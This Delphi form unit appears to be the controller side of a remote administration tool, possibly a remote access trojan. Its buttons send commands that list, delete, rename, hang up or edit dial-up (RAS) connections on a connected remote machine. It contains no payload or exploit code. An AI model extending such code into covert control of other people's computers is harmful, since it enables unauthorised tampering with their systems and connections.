(***********************************************************************
************************************************************************
****                                                                ****
****                                                                ****
****     File Name: untRAS.pas                                      ****
****                                                                ****
****     Author: //hIDRA_5                                          ****
****                                                                ****
****     Description: Unit main of RAS form                         ****
****                                                                ****
****                                                                ****
************************************************************************
************************************************************************)

unit untRAS;

interface

uses
  Windows, SysUtils, Classes, Controls, Forms, StdCtrls, Buttons, Dialogs;

type
  TfrmRAS = class(TForm)
    GruEntries: TGroupBox;
    LstEntries: TListBox;
    SpdRefresh: TSpeedButton;
    SpdRename: TSpeedButton;
    SpdDelete: TSpeedButton;
    SpdShwEdit: TSpeedButton;
    GruExtra: TGroupBox;
    SpdHangUp: TSpeedButton;
    SpdShwNew: TSpeedButton;
    procedure SpdRefreshClick(Sender: TObject);
    procedure SpdDeleteClick(Sender: TObject);
    procedure SpdRenameClick(Sender: TObject);
    procedure SpdHangUpClick(Sender: TObject);
    procedure SpdShwNewClick(Sender: TObject);
    procedure SpdShwEditClick(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  frmRAS: TfrmRAS;

implementation

uses untMain, untCommands;

{$R *.DFM}

procedure TfrmRAS.SpdRefreshClick(Sender: TObject);
begin
   LstEntries.Items.Clear;
   frmMain.strStatus:='Rception...';
   frmMain.SendCommand(COMMAND_RAS_ENTRIES,'');
end;

procedure TfrmRAS.SpdDeleteClick(Sender: TObject);
begin
   if not frmMain.ClientMain.Active then
   begin
      frmMain.PutStatus('Pas connect...');
      Exit;
   end;
   if LstEntries.ItemIndex < 0 then
   begin
      frmMain.PutStatus('Choissez une entre...');
      Exit;
   end;
   if MessageBox(Handle,'Effacer??? sure??',
      PChar(frmMain.Caption),MB_ICONQUESTION or MB_YESNO) = ID_NO then
      Exit;
   frmMain.strStatus:='Effacage..';
   frmMain.SendCommand(COMMAND_RAS_DELETE,LstEntries.Items[LstEntries.ItemIndex]);
end;

procedure TfrmRAS.SpdRenameClick(Sender: TObject);
var
   OldName,NewName:string;
begin
   if not frmMain.ClientMain.Active then
   begin
      frmMain.PutStatus('Pas connect...');
      Exit;
   end;
   if LstEntries.ItemIndex < 0 then
   begin
      frmMain.PutStatus('Choisir une entre...');
      Exit;
   end;
   OldName:=LstEntries.Items[LstEntries.ItemIndex];
   NewName:=OldName;
   if InputQuery(frmMain.Caption,'Nouveau nom:',NewName) then
   begin
      if UpperCase(Trim(NewName)) = UpperCase(Trim(OldName)) then
      begin
         frmMain.PutStatus('Autre nom svp...');
         Exit;
      end;
      application.title:=OldName;
      frmMain.strStatus:='Renomage..';
      frmMain.SendCommand(COMMAND_RAS_RENAME,OldName + Chr(13) + NewName);
   end;
end;

procedure TfrmRAS.SpdHangUpClick(Sender: TObject);
begin
   frmMain.strStatus:='Bloquage...';
   frmMain.SendCommand(COMMAND_RAS_HANG_UP,'');
end;

procedure TfrmRAS.SpdShwNewClick(Sender: TObject);
begin
   frmMain.strStatus:='popup...';
   frmMain.SendCommand(COMMAND_RAS_NEW_CONN,'');
end;

procedure TfrmRAS.SpdShwEditClick(Sender: TObject);
begin
   if not frmMain.ClientMain.Active then
   begin
      frmMain.PutStatus('PAS connect...');
      Exit;
   end;
   if LstEntries.ItemIndex < 0 then
   begin
      frmMain.PutStatus('Choisir d''abord une entre...');
      Exit;
   end;
   frmMain.strStatus:='popup...';
   frmMain.SendCommand(COMMAND_RAS_EDIT,LstEntries.Items[LstEntries.ItemIndex]);
end;

end.
